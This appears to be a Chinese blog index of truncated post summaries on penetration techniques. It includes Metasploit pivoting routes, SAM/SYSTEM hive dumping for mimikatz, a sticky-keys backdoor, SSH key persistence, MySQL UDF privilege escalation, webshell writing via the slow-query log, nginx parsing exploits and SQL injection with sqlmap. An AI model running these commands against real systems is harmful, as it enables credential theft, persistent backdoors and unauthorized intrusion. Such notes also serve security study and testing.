摘要:
Metasploit 「跨网段攻击」添加路由表 run get_local_subnets run autoroute -s 172.16.63.0/24 background route print use auxiliary/scanner/portscan/tcp show options 路 阅读全文
摘要:
使用SAMInside获取用户密码 reg save hklm\sam C:/sam.hivereg save hklm\system C:/system.hive 用cain解密 或者复制sam到自己本机上然后再用 mimikatz获取登陆过的账号密码 mimikatz log privilege 阅读全文
摘要:
密码破解 shift后门 shift控制 Windows c:/system32/sethc.exe 换成cmd.exe 追加自己的公钥 ssh-keygen 生成公钥ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub 获取自己的公钥 连接的时候可以指定私钥来连接 ssh 阅读全文
摘要:
MOF提权 UDF提权 select load_file('/var/www/html/udf/udf.so') into dumpfile "/var/lib/mysql/udf.dll" create function sys_eval returns string soname 'udf.so 阅读全文
摘要:
信息收集: Google Bing Baidu Yahoo 子域名挖掘机 主站爬取-crossadmin.xml Whois 反查询 https://www.benmi.com Ip反查询 Site.ip138.com 工具:Subdomainbrute sublist3r 服务信息收集: 大小写敏 阅读全文
摘要:
开启日志的情况下 access.log 用burp让其转义,然后用文件包含可以执行其中代码 general_log slow.log set global slow_query_log=1; set global slow_query_log_file='D://404.php' -- 地址 sel 阅读全文
摘要:
以下转自clancyb00m的github nginx nginx <8.03 空字节代码执行漏洞 影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 上传图片马然后这样访问: 就会执行PHP代码 nginx 1.6.2 如果hack.php不存在,就会以.ph 阅读全文
摘要:
使用sqlmap用dump就要进行拖K,在本地C中的sqlmap,在c盘搜索sqlmap/outpot/ip/dump/中 sqlmap的语法结构 分为免python环境的和需要python python sqlmap.py -(u|r) "(url|text)" -p "id" -u url -r 阅读全文
摘要:
nslookup正向解析为ip地址 nslookup www.baidu.com nslookup -q=ptr ip地址 逆向解析域名地址 nslookup -q=mx 查询邮件交换记录 nslookup set q=mx netstat -anb 显示各种网络相关信息 tasklist 看系统上 阅读全文
摘要:
Mid(database() from 1 for 1)==mid(databse(),1,1) 在数据库中字符型字段中条件值为false可以获取全部数据 数据库一般有三种报错 (1)Extractvalue()中第一个为错误参数就会错误报出第二个参数语句 (2)Floor(rand(0)*2) 插 阅读全文